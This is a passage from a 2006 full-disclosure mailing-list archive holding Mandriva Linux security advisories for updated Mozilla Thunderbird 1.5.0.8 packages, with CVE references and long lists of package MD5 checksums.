 ba3e7a92e79e00cd74b722ab94d832eb  corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
 c11927081645df376c72f27e8ebc6a85  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
 448172b7c753b48c81b2a2c5d337b9e5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
 b83c0eb2158672f087fd5754ca27efad  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
 49b91f3eae7a0773ecce62f635a6dfe9  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
 3a0cf5325721e29c4eba9ee7cbc7efb7  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
 cadf1aff1e915adb9e14539eb04521db  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
 8218118b837bf05b3603652f0d4c5690  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 7c7190fc9ec1fc5774436ec7b0c92fd5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
 a42f63c64470ba933d6239bdf8b1569c  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 af8c5d7e3569278f3e9d364362be25b3  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 c749a5b7ac03ad98919f83425fcbd4c2  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ac82cd1f4fc0c5ed57be5b165cc65be4  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
 0fbd67977bdfc1b1f9aa3c846c80c244  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4d26f0c7b32d3888e1e5c4c14516a4df  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 37fbc8358f1f11d5cb9f0e9b2fab3b26  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 6bec775a601e84be547246ae5638d059  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
 0dc1c40ef6d1a233661048447db25543  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 7ec948cc8df84aae6b3d660bd4187208  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4b7ba48ffeff51709b26c8f315a4aaa1  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 94fceae9b7bc6d48fe2677eecaaf11a6  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d578499c38c981f2b8cc55fc1351efef  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
 095291274be4a418d05c4e96cb441d90  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 272b554e86966e103d3e7f42b5cba9db  corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
 52bd52c4d5eaad6fa541dd20db5411d0  corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 2536b28aa209a912ff74601db4e685b4  corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 484ad35799b9a8cd277754bf1b13d686  corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
 42ff5a3a8320c4be3ffb1f1d74912f78  corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 8a46a1d9f9380c205699ce090d749ff2  corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
 3c30c5aeee783bfabe34fb1ff7357d38  corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 a90b14f77d6eed2228bfa55457803f6f  corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
 719239492f7d93b04f2c95902fccf94c  corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 f52bcdf19f10745e756f0d58616126df  corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
 79826e403152cbe90ddf3bd4d8d64abe  corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
 18c08993c8f43c976be6cf2e8cfb2c35  corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
 b17866029fe4244a77af59fbb55a07b9  corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
 878f59fdb3ebb5929fc23437a17fb5ad  corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d62fb25dc173e8b12be8623ae8fbf9bf  corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
 266322718c7cedd78e89524940f15d55  corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 32c5fcab859aff66aaf704b997a1c625  corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 17d7eeb0fbd25df1f76d5fa875ef7a3d  corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4aabd47a35cb15547ccbe4eda1b521e8  corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 1d8d27be2902605b0eae9dcbd89654cc  corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
 6c116048a69b3c176831fde5ff0a252a  corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 e5bcb8518c5a61e63e62f90c363c67ae  corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 5569afdd940d28bdf37a1003d5d5d6b0  corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d00245da432be7a7d268846891555930  corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ee130a70f9b1fe5719fea63963f3db6d  corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 81f41bebeb9eca34d7c27ab81ca41af6  corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm 
 04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
 98c5a4c000178cf57677fa6ee70adb71  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 124ecce0dd9a26b565eef6c2f7e14401  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
75x+jP9FNzlE7ieAV3r7Czs=
=DdKu
-----END PGP SIGNATURE-----



From security at mandriva.com  Fri Dec 15 21:36:00 2006
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 15 Dec 2006 14:36:00 -0700
Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird packages
	fix multiple vulnerabilities
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:206
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : mozilla-thunderbird
 Date    : November 9, 2006
 Affected: 2007.0, Corporate 3.0
 _______________________________________________________________________
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 1.5.0.8.

 This update provides the latest Thunderbird to correct these issues.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
 http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 488e65dfe45ecf7e3a9e1a3dedd5c2ce  2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
 5e551ab45061148722dda1d7ce66959e  2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
 2149a7fd629b8bc6843c6fdf1bb49efb  2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 0d2315b490e3b8dd2ab791bd6c3ee516  2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 d5583d1b99b948c90e1cad62d753d67d  2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
 00ec607c39d3de4c589997d6c7ee6679  2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 6d1f0f2576362a0bb90b4f9d8c4f2153  2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
 2cb0e44d2e3f7fddd60249843204403f  2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 0c3c771882698d5651775aeed24bfd73  2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
 477ca905391c1d555d0136d46d557869  2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 741811dd392d942b27e1b3b0de695d4e  2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 7c2c4922c6a2c6ce2cb6108a95f7dbfa  2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 7cbf9f3218d587ef97edf01f2298096b  2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 7dbd9e4c16db82a761a7b502c1f7f22d  2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 b6dd6119216f6b748ee7c1570c3b8c37  2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 1eea732e08ca0ef96796c3f50abb1f77  2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1cc5cf2496581d776bb43e2f0dbbea6  2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 af86ce82ff9053250f82f2215c8dd7e5  2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 6319633c561c7f68c6614685126da02b  2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 56387829c6cc83882246e68e3b8704b0  2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 56cb838bb0c375f53d3cff2eb76a1118  2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 253500598ff56ab85394e68708ace21d  2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 53b4d4f1aa4e8174a33a0ed436ce961a  2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 fb9dd6933d27029538cd01a64ec55cee  2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
 701b9837303a3ed79e6c74c037c28926  2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 b3739c1344770e92864c50f131f08884  2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 1efe7ebc2a71e2f2d6c2785026a6e7ac  2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 6860352b37999652aab785a266673e2f  2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 51abe323b14793097935b0c221e64f71  2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 b8ec884437a460c9fbb5c71db6a46c31  2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 9ae4fb1871ee29f3f7b52210c0cf4e1b  2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1a31b03ffef8e86df09579296fce3c9  2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 6b4bdbb4648231b128655e56015621c7  2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
 d333252ee1ba51351762e4050565ecb1  2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 0a2828dbab70a2be0e721cc016f93d7f  2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 defa2ac291c66f693946362bd2501c40  2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
 c5540aa8289eefbf3e708e442de77aa8  2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
 45da9968c4661ef994ef1dcefd0ad54f  2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
 df8d2ea1013a65457aa1f2100060d968  2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 f87f2441b2ca36d4f5c3f3f2dd04b3bb  2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 bc3a281fbc5c09b7f962dfb1d3b9e517  2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 2563050985477697472069d08e96de0f  2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
 e22be985ae58ab3eba5b90aa6a3eb58e  2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
 fde0d1b9c4feee3c1e239345f4065090  2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
 10be2386887a6c70bc4f9c0453b33072  2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 1c92d5ee79fc52ec1525f3c96dfa1916  2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 42e6ddb4a33a297c71b996bf651a4d69  2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
 96394d1245284a886b954bb063c0ab5b  2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 8386317130e064260bd8b114616410ed  2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 eb622e8adc0767e090a608e80a1611b7  2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 3ca6736aaf725851a0be21f0490aeb20  2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 47b16b8c45acc936b62051594ed87c69  2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 c2e742162882c52761040025ff4ddfff  2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 072c5224bd49a45ba7ab0a57f657ec6e  2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
 3393e810730d305adc4fe8ecc98b782a  2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 70882501b0fc01a56cee67c2b7c63ac5  2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm 
 e408368ca02e7efbbece9adbaaea7d56  2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
 7867a124b85e4a8098ec7b814267c1f5  2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
 e776e0c4c5a6ff592af0c346bf8b4511  2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 47aa8c7af46ee44f1b51e0f44772beeb  2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e284b46733e04ab96cccb612de04e5a8  2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e73efd093c48aa82d6f73025f1ade443  2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ed790bdd1a45343b427925765f5f2b5c  2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 61690a97ef04b6083693ffe4a9ab3176  2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 889574eda89385739aad6eda7f3d2604  2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ef9b59cdd619da74737b5e91e4067386  2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e20a88ece32f8ee81aaedd828558d880  2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 250f6f86984922da278774d480ba37a7  2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 f683dba38c9055cbac36f8468e357ebf  2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6594d0bb3f7770f168728827c1cf9f83  2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1ee011c3c94c7b081f53b9a55996da0c  2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be24dd32e628b8294c1b87d200cf02dd  2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 020acf8e510080a701c6278c6eb862ae  2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 af4c92e4f3eaf833111572ead14c8c04  2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7483c3a55198fcbc9be2c9750919a370  2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 753acdb58e6400659dab48ff78f371e7  2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 fb83f542bd12edda5e85d9873a08a938  2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 996bbfb13654cfc2180036ea6b1e61df  2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ff6217b99ab96a1444b6a758bf184ecf  2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 f15d9f053011068deba71fdc05dc6d46  2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 98f63b0dedef781ec16f8bebb6a032cb  2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e5e42bb849d26a4f59fb6204d6ed9850  2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8bc9d56d4778baf40b115eb805a506b3  2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 21c7d7ffd14a724e4ce9d96e99d0f3c7  2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9b115831c8ae36d7141c93a9d867d445  2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 d6efb3cdaba13c17dd31147011796614  2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 4239765036a0bffaa4fcff9fb076a221  2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be87cc456600cb0dc18730ae3f75af92  2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 459367e42865a1de4374d2a9b8c36232  2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1e1b30720806b2c6ab650251f9756127  2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 70c5525bea63d291374706abfb4523c4  2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 4addf81f6fdb0fe55d2274ba726d066e  2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9c9a1e6a7623a712f40666e77fd3f2b4  2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9cd9d0509bbe4d0bc7c092118253c237  2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 b23236fc11caa38b1354893f1e9863e1  2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 c5b898d7f04c26a34bb4223ee4547586  2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8e114fec014131d472790035a1509783  2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 3eda3b36a83c550a1f52faf6adfb0b10  2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 c336cc525567465d1649ee55c604d3a3  2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 476f974ea2e3b9ef971231b8b08e62f0  2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7878332de8134b9025b924315d6ffbf6  2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7602f9099c26d60e934f54918dd38e46  2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 52ba4b91175db4376fd4c4e9018969c3  2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1e2bc31ee83c5c47f06953aba976a27d  2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 47b180beb65802e89f7e6a8be7f33d15  2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6485a71b5d07fef3e337630aa53bb4c6  2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6b5df9cad533fc75fc47191df5f3dabf  2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 99b61d660a72eff639f78ec0422aeaf2  2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 99cfe247978fe85b5b5186bf12247f3a  2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8c393629997cea717c2f1e8d077a9344  2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be518e4b4833e6cb9d083871101be35b  2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8dedff0ffd0e7b7721b256f01821f188  2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 05202d61506a60981fb9a317ce6a5d5d  2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 0deda88ec857fb0c11b57555814a20ec  2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 0f2f7928b2edfbe0ae5faf127b0ed066  2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm 
 e408368ca02e7efbbece9adbaaea7d56  2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
 7867a124b85e4a8098ec7b814267c1f5  2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
 e776e0c4c5a6ff592af0c346bf8b4511  2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm

 Corporate 3.0:
 71192ef0a8bd28533718191d287d8158  corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
 c0121a4a0192d7944b1f8d30c977ab38  corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
 53c403f48cb8547f0eb646ab1b41b656  corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
 032ebcc12942292620b05929e0583f3a  corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
 c88d6e26aa75dab433abcf71f2962e5c  corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
 dcc54cb45829470f4267806696b46eca  corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
 e7ba899422d7cbfd343659b810e4ee52  corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
 d987b44bd201c2a23b404751e13df538  corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
 9d496fa524a5226676f56ed87d2015ec  corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
 eac64993c47963ede70eca5fb62e30b9  corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
 b5523fcbf2370d1805e1f917faaa31c8  corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
